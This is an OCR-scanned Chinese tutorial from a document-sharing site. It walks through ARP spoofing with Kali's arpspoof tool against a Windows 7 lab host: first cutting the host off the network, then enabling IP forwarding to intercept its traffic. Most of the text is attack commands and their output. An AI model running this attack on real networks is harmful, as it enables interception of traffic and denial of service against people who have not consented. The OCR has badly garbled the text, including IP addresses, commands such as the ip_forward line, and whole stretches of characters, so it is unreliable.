




版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領
文檔簡介
ARP欺騙實例
Kali中利用Arpspoof工具進行ARP攻擊
ARP攻擊是利用A即協議設計時缺乏安全驗證漏洞來實現的,通過偽造A即數據包來
竊取合法用戶的通信數據,造成影響網絡傳輸速率和盜取用戶隱私信息等危害。
我們進入我們的目標主機系統Windows7,我們通過::md命令查詢一下目標主機系統的
IP地址,我們在Windows終端內輸入:ipconfig命令,可以看到我地址為35,
網關地址為:192.168.1882。
國IC:\Windows\sy5tem32\cmd.exe
MicrosoftWindows[版本6.1.7601]
版權所有<c>2009MicrosoftCorporation^保留所有權利。
:\Users\adnin>ipconfig
WindowsIP配置
以太網適配器本地連接:
寺定的DNS
7IPv6:fe80::e09a:e261:29af:c321xll
1..:192.168.188.135
:255.255.255.0
:192.168.188.2
隧道適配器isatap.<BBF6CDC3-34D0-4482-BCBC-054B49C7E636):
薪鬣的,最看線:媒體已斷開
:\Users\adnin>a
我們在通過ping命令來測試一下目標主機網絡是否通信正常,我們ping一下新浪,回車后
我們可以看到網絡通信止常。
:\Users\adnin>pingv/ww.sina.con
二在
二Pingspool[0]具有字節的數據:
自
id回
L
、0V主節=32時間=3nsTTL=128
回
J-自
、0l:字節=32日;間=2msTTL=128
回
自
、0|:定節=32年間T2msTTL=128
回
自
二
、0f:字節=32時間=2in~sTTL=128
60的Ping統計信息:
色上弓卷送=提灰=%丟失=?!慈G失),
:的估尋奇融以量秒為聿(金
三
.O-2ms,眼長-12ns,平均-4ms
我們回到Kali系統,在終端內輸入:ping192.168.18&135命令,確認與目標系統網絡通
信正常。
o?*Wiredconnection1O
連接名痔(N)Wiredconnection!
常規以太網802.1X安全性DCB代理IPv4ifl?IPv6設置
ififi(D)
克隆的MAC地址回
MTU自動+字節
?丈認舊物理(P)單描(U)多懵什)
LAN喚醒
忽略。:rffl(B)地址解析例議(A)幻斂接包(G)
LAN唉時更碼(W)
植路協商(K)忽略
速度⑸100Mb/?
雙工(X)全雙工
取消(C)?保存(S)
OWiredconnection1
連接名稱(N)Wiredconnection!
京規以太網802.1X安全性DCB代理》丫4設置IPv5ifi?
方法(M)手動▼
地址
地址子網俺碼網關那加(A)
205410.4.
■除⑼
DNSA6務器M114.114.1K.114
搜索域(E)
DHCP客戶選ID
篙要IPv4地址完成這個連接
路由(R)…
取消(Q/保存⑸
?—(adminl?bogon)-[*]
L$ping35I
PING35(192.168.188.135)56(84)bytesofdata.
64bytesfrom192.168.188.135:icmp_seq=lttl=128time=0.619ms
64bytesfrom192.168.188.135:icmp_seq=2ttl=128time=0.255ms
64bytesfrom192.168.188.135:icmp_seq=3ttl=128time=0.229ms
64bytesfrom192.168.188.135:icmp_seq=4ttl=128time=0.283ms
AC
——35pingstatistics——
4packetstransmitted,4received,0%packetloss,time3076ms
rttmin/avg/max/mdev=0.229/0.346/0.619/0.158ms
我們再輸入:ping命令,確認與網關通信正常。
-$ping
PING()56(84)bytesofdata.
64bytesfrom:icmp_seq=lttl=128time=0.221ms
64bytesfrom:icmp_seq=2ttl=128time=0.115ms
64bytesfrom:icmp_seq=3ttl=128time=0.160ms
64bytesfrom192.168.188J2:icmp_seq=4ttl=128time=0.211ms
64bytesfrom:icmp_seq=5ttl=128time=0.118ms
64bytesfrom:icmp_seq=6ttl=128time=0.067ms
64bytesfrom:icmp_seq=7ttl=128time=0.215ms
AC
—pingstatistics—
7packetstransmitted,7received,0%packetloss,time6142ms
rttmin/avg/max/mdev=0.067/0.158/0.221/0.055ms
確認網絡狀態后我們來構造ARP攻擊命令,我們在終端內輸入:arpspoof-iethO-t
35命令,其中i參數為我們本機指定的網卡eth令t參數為我們
要攻擊的目標主機?;剀嚭笪覀兛梢钥吹終ali會不停截取目標主機發向網關的數據包。
-(adminl^bogon)-[*]
C$現及arpspoof-ieth0-t35
0:c:29:c6:83:a0:c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a
我們回到Windows主機,通過在終端內使用ping命令來確認網絡狀態,我們ping新浪
后發現已無法正常的網絡通信。
C:Misers\adnin>pingwww.sina.com
潘求找木刻王機www.sina.con,>請檢查該名稱,然后重試。
至此我們通過arpspoof工具造成了目標主機的網絡斷網的實驗就完成了。
下面我們來介紹一下使用arpspoof工具進行ARP欺騙的示例,我們打開Kali終端,在
終端內輸入:/proc/sys/noi/ipv4/ip_forward命令,ip_for\vard是配置文件,默認內容為0,表
示IP轉發是關閉的,使用上述命令'echoT>/proc/sys/net/ipv4/ipforward,將該配置文件
的內容改寫為1,表示開啟1P轉發。
一~
ecno"1'/proc/sys/net/ipv4/ip_forward
開啟IP轉發后流最會經過Kali的主機后再到目標主機,所以我們在使用arpspoof工具時
FI標主機就不會斷網,因為流量通過了Kali主機我們就可以獲取相關數據。我們下面的操作主
要內容是:發送偽造的ARP請求包,修改目標主機中ARP緩存表,實施ARP欺騙。當攻
擊完成后,我們通過controI+C的命令結束ARP的欺騙操作。我們現在開始進行演示,
我們在Kali終端內輸入:arpspoof-iethO-t3528命令,回車
后Kali會向Windows(192,168.188.135)發送ARP響應包,告訴Windows目標主機
192.168.188,128就是網關地址。
一(root?bogon)?-[**]
tarpspoof-i(?th0-t35
0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a
0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a
0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a
0c:?9:r6:R^0r:79:h:14:dS0H0647:arprpply19?.1RR.1R8.?is-at0:c:29:r6:83:a
0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a
0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a
0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a
0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a
0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a
0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a
0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a
0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a
0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a
0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a
0c:29:c6:83:a0c:29:b:14:d5080642:arpreplyis-at0:c:29:c6:83:a
現在我們就完成了對目標Windows主機的網絡欺騙,目標主機會將所有的流量戮據先
發給我們Kali主機,同樣發送到目標主機的流量數據也會先發送到我們Kali主機中。我們登
錄到目標Windows系統,可以通過在終端內輸入ping命令來測試網絡是否能夠正常通信,
我們在終端中輸入:ping-t這時我們可以看到Windows系統到新浪的網絡
狀態是正常通信的。
lh
H
4
、回節「-
3
—2日
=
三二m
二》-
t
128
TTL=
60
.37.
49.7
=3
二^回
節一-
~
3
2
□
m
=
^二
三□
=3
128
TTL=
60
.37.
49.7回
」節-
n
2
2
uh
C
m
、=
三i
=3
J
回D
M
128
TTL=
60
.37.
49.7
士節-
2
2二日
m
=3
回=
uh
-
、i
128
TTL=
60
.37.
49.7
-一
J
H
節-
=3
3
2二
T
C
一m
=
二I
m
y
^
128
TTL=
60
.37.
49.7
=3
Mh
.
」
節-
「
2
、2
m
O
I
三—=
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經權益所有人同意不得將文件中的內容挪作商業或盈利用途。
- 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
- 6. 下載文件中如有侵權或不適當內容,請與我們聯系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
評論
0/150
提交評論